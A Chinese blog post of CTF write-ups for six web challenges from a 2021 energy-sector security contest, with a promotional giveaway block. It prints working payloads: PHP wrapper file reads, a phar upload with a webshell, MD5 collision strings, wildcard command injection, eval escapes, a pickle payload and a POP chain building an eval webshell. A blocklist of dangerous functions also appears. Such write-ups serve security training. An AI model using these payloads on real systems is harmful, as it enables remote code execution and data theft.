CTF 专题一 2021 网络 WEB 题目解析

网络安全学海

关注

发布于: 刚刚

0x01 前言

背景：2021 年 10 月 15 日的“中国能源网络安全大赛”

感觉 WEB 的考点形形色色，其中有 1 道偏于黑盒测试的简单题目，4 道是白盒审计类题目，还有一道是 Python 的反序列化题目，题目名称大致如下：

因为唯一的一道黑盒题目还是文件包含题目，所以将题目源代码全部扒下来了，给大家提供复现环境。（flag 自己创建）。

[外链图片转存中...(img-xt3lQOza-1634628653889)]

为了感谢广大读者伙伴的支持，准备了以下福利给到大家：
[一>获取<一]
1、200 多本网络安全系列电子书（该有的都有了）
2、全套工具包（最全中文版，想用哪个用哪个）
3、100 份 src 源码技术文档（项目学习不停，实践得真知）
4、网络安全基础入门、Linux、web 安全、攻防方面的视频（2021 最新版）
6、网络安全学习路线（告别不入流的学习）
7、ctf 夺旗赛解析（题目解析实战操作）[一>获取<一]

下面分享这次比赛的解题过程。

0x02 ezphp

这是一道很简单的题目，同时也被大家刷成了签到题。

打开界面显示如下：

[外链图片转存中...(img-LtlobqMI-1634628653897)]

单机按钮后会返回源代码，如图：

[外链图片转存中...(img-YfGdJb6e-1634628653932)]

这里 MD5 的判断已经是千年老题了，使用数组就可以绕过。

问题是下面的 $r e s 的结果不可以包含 f l a g 字符串，这里的话我们可以通过 p h p 伪协议将它进行 b a s e 64 加密绕过即可。但是我们可以注意到$ request_url 中间是拼接了一个 url 地址的，如图：

这里我们可以将 php 伪协议拆分成两段，例如：

php://filter/read=convert.base64-encode/****v/popular/all****/resource=/flag，这样虽然 PHP 会抛出异常，但是也是可以正常运行的，如图：

Base64 解密获得 flag：

0x03 phar

这道题有一定的黑盒成分，也是比较简单的一道题目，首页如下：

[外链图片转存中...(img-0NXBSmn3-1634628653949)]

我们可以看到这里给出了一个 hint，那么访问 include.php 看一下，如图：

给出了提示，说参数的 key 值为 file，那么包含/etc/passwd 看一下结果：

显然这里包含失败了，在这里我们只能对源代码的编写进行猜测，这里有两条路可选：

1: 程序写法为 include $_GET[file] . '.xxx'; 针对这一种情况，我们可以 fuzz 后缀到底是什么，然后再进行读源码或包含一系列操作。
2: 显然这一条路是比较离谱的，也就是说，根据题目名为 phar，是否考点为 phar 反序列化？或者这里存在一个辅助的 class.php 文件，只是我们不知道 class 的文件名而已，但是由于这里的 hint 为 include.php，显然这一条路是比较离谱的。

那么这里可以包含以下 include，如图：

显然形成自己包含自己，后缀确定为.php，使用伪协议阅读源码：

这里不让使用 base，那么我们可以使用 url 二次编码绕过，将“e”字符进行二次编码，如图：

[外链图片转存中...(img-t3OrfaOc-1634628653965)]

怼出 php 源码：

[外链图片转存中...(img-BrKyMNST-1634628653968)]

根据 hint.php 找到上传点 upload.php，这里读取 upload.php 源码，如图：

这里限制了后缀与 mime 类型，但是没关系，我们可以上传后缀为 jpg 的 phar 文件，在 phar 文件中存放一个 1.php 为一句话木马，包含即可，如图：

[外链图片转存中...(img-6LMF690S-1634628653973)]

然后 phar 包含：

0x04 HardCode

这里第一个 if 判断使用 md5 强碰撞即可。

M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2

M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

下面的 preg_match 过滤也是比较严格的，这里首先判断版本号，笔者通过 http 头发现 php 版本为 5.2.9 版本，如图：

[外链图片转存中...(img-WpTRjZVz-1634628653978)]

显然这里的 preg_match 只是多了一个 @符号的限制，但是我们还是可以通过 Linux 的通配符来匹配的，如图：@的 ASCII：

那么根据题目中的过滤 0-9，我们可取的也就是 @与数字 9 中间的特殊符号：

这里笔者取“>”，完整的正则写为[>-[]。

构造 Payload：

x=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&y=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&code=.%20/???/????????[\>-[]

如图：

睡眠 3 秒，这里可以直接反弹 shell。

0x05 CODE

毫无卵用的加密，然后对 eval 一步一步 echo 得出如下源代码：

<?php
// error_reporting(E_NOTICE);
highlight_file(__FILE__);
@session_start();
$username = @$_GET['whoami'];
if(!@isset($username['admin'])||$username['admin'] != @md5($_SESSION['username'])) {
die('error!');
} else {
if(isset($_GET['code'])) {
$admin = $_GET['code'];
$admin = addslashes($admin);
if(preg_match('/\{openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|scandir|assert|pcntl_exec|fwrite|curl|system|eval|assert|flag|passthru|exec|system|chroot|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore([^}]+)\}/i' , $admin)) {
die('error!');
}
if (intval($admin)) {
eval('"' .$admin .('"./hh.php"') .')}}";');
}
} else {
eval('$flag="' .$admin . '";');
}
}
?>

复制代码

这里 $_SESSION[username]是 null，所以我们只要使用一个空的 md5 串就行：whoami[admin]=d41d8cd98f00b204e9800998ecf8427e

下面$_GET[code]经过了addslashes函数，无法闭合下面eval('"' .$admin .('"./hh.php"') .')}}";');的双引号，我们打印一下如图：

[外链图片转存中...(img-kfuxBacd-1634628653991)]

这里肯定回抛出一个语法错误的，因为语法格式是错误的。

但是在双引号包裹 ${}进行执行还有一个姿势，如图：

这种写法就允许了两对双引号在未经反斜杠转义下的解析。

那么构造 Payload：?whoami[admin]=d41d8cd98f00b204e9800998ecf8427e&code=1${${print(

[外链图片转存中...(img-YjI5C7on-1634628653996)]

这样成功输出了./hh.php，在 preg_match 中并没有过滤反引号，我们可以通过反引号来执行命令，如图：

[外链图片转存中...(img-1F6ftDdJ-1634628653998)]

放在题目中查看 flag 位置，如图：

[外链图片转存中...(img-A4rgEY86-1634628654002)]

但是在 preg_match 中过滤了“flag”字符，这里可以使用 Linux 的通配符来匹配，如图：

[外链图片转存中...(img-Dw9mv3Pw-1634628654003)]

0x06 EZpy

阅读源代码：

import base64
import io
import sys
import pickle
import b
from flask import Flask, Response, render_template, request
app = Flask(__name__)
def read(filename, encoding='utf-8'):
with open(filename, 'r', encoding=encoding) as fin:
return fin.read()
class people:
def __init__(self, name, sex, age):
self.name = name
self.sex = sex
self.age=age
def __repr__(self):
return f'people(name={self.name!r}, category={self.sex!r}, age={self.age!r})'
#==判断
def __eq__(self, other):
return type(other) is  people and self.name == other.name and self.sex == other.sex and self.age==other.age
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module[0:8] == '__main__':
return getattr(sys.modules['__main__'], name)
raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def here_load(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
@app.route('/',methods=['GET','POST'])
def index():
if request.args.get('source'):
return Response(read(__file__),mimetype='text/plain')
else:
return Response("/?source=")
@app.route('/app', methods=['GET', 'POST'])
def inll():
if request.method == 'POST':
try:
pickle_data = request.form.get('data')
if b'R' in base64.b64decode(pickle_data):
return 'no no no'
else:
result = here_load(base64.b64decode(pickle_data))
if type(result) is not people:
return '？？？？'
correct = (result == people(b.name, b.sex, b.age))
if correct:
return Response(read('/flag.txt'))
except Exception as e:
return Response(str(e))
test = people('test', 'test','55')
pickle_data = base64.b64encode(pickle.dumps(test)).decode()
return Response(pickle_data)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000)

复制代码

这里过滤了 R 指令码，那么跟进 here_load 方法，如图：

这里指明了只可以获取__main__模块下的包，那么这里命令执行暂时先不考虑，我们继续往下看代码：

[外链图片转存中...(img-cl52fNOn-1634628654011)]

将反序列化出来的对象与 people 对象进行比较，默认比较应该按照地址进行比较，但是这里的 people 类写了__eq__魔术方法，这里的比较就只是生成出来的对象的属性比较了，如图：

那么我们就可以通过 Python 反序列化，去修改 b 包中的 name，sex，age 属性，并且再生成一个 people 对象，经过__eq__的比较，即可获取 flag.txt 的内容，编写 POC：

import base64
data=b'c__main__\nb\n}(Vname\nVtest\nVage\nV13\nVsex\nVnan\nub0c__main__\npeople\n)\x81}(Vname\nVtest\nVage\nV13\nVsex\nVnan\nub.'
print(base64.b64encode(data))

复制代码

发送 Payload：

[外链图片转存中...(img-1K3ZFcp0-1634628654015)]

获取 flag。

0x07 ezp0p

纯纯的代码审计题目：

<?php
error_reporting(0);
highlight_file(__FILE__);
class This{
protected $formatters;
public function want(){
echo "what do you want to do?";
}
public function __call($method, $attributes)
{
return $this->format($method, $attributes);
}
public function format($formatter, $arguments)
{
$this->getFormatter($formatter)->patch($arguments[0][1][0]);
}
public function getFormatter($formatter)
{
if (isset($this->formatters[$formatter])) {
return $this->formatters[$formatter];
}
}
}
class Easy{
protected $events;
protected $event;
public function __destruct()
{
$this->events->dispatch($this->event);
}
public function welcome(){
echo "welcome CTFer!";
}
}
class Ctf{
protected $ban;
protected $cmd;
public function upup(){
echo "upupupupupupup!";
}
public function __construct()
{
$this->ban='script';
$this->cmd='whoami';
}
public function dispatch($cmd){
call_user_func_array("script",$cmd);
}
}
class Gema{
protected $xbx;
public function gema(){
echo "wish you like this ezp0p!";
}
public function __construct()
{
$this->xbx='script';
}
public function patch($Fire){
call_user_func($this->xbx,$Fire);
}
}
if($_POST['x']!=$_POST['y'] && md5($_POST['x'])===md5($_POST['y'])){
if(file_get_contents(substr($_POST['x'],0,20))!=null){
@unserialize(base64_decode($_POST['data']));
}else{
die('To read this file??');
}
}else{
die('maybe you are right??');
}
?>

复制代码

首先这里的 unserialize 函数是一个门槛，如图：

[外链图片转存中...(img-ZqYJURnm-1634628654020)]

要求 file_get_contents 必须读出内容，再加上前面的 md5 判断，我们这里可以使用 fastcoll 生成 md5 的前 20 位为./././././/index.php，然后进行 MD5 强碰撞即可。

下面进行挖掘 POP 链路，如图：

源代码传送门：

链接：https://pan.baidu.com/s/1byWki_NV9yZNb34xuGEkBA 提取码：xv3m

编写 POC：

<?php
class Gema {
protected $xbx = 'assert';
}
// AAAAAAAAAAAAAA
class This {
protected $formatters = ['dispatch' => 'obj...'];
public function __construct($obj){
$this -> formatters['dispatch'] = $obj;
}
}
class Easy{
protected $events;
protected $event = [1 => ['eval($_REQUEST["c"])']];
public function __construct($obj)
{
$this -> events = $obj;
}
}
$obj = new Easy(new This(new Gema()));
echo base64_encode(serialize($obj));

复制代码

获取 Flag：

发布于: 刚刚阅读数: 2

网络安全学海

关注

我是一名网络安全渗透师 2021.06.18 加入

关注我，后续将会带来更多精选作品，需要资料+wx:mengmengji08

发布

暂无评论

创作场景

CTF 专题一 2021 网络 WEB 题目解析

0x01 前言

0x02 ezphp

0x03 phar

0x04 HardCode

0x05 CODE

0x06 EZpy

0x07 ezp0p

网络安全学海

评论